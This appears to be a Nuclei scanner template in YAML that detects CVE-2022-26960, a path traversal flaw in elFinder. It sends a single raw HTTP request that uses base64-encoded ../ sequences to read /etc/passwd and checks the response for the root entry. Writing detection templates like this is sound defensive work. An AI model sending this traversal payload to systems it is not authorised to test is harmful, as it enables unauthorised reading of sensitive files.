49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2022-26960
|
|
|
|
info:
|
|
name: elFinder <=2.1.60 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: |
|
|
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
|
|
remediation: |
|
|
Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
|
|
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
|
|
- https://www.synacktiv.com/publications.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2022-26960
|
|
cwe-id: CWE-22
|
|
epss-score: 0.88417
|
|
epss-percentile: 0.98433
|
|
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: std42
|
|
product: elfinder
|
|
tags: cve2022,cve,lfi,elfinder,std42
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402204cc48b95204bec849af8cb9b0c2a887407df7d9931f1c1d26fa625985f6a144e02203c8acd3a044c0f112ed2af89d5cf6ca48ff3d1c9a075a17717dca297ea10bb80:922c64590222798bb761d5b6d8e72950 |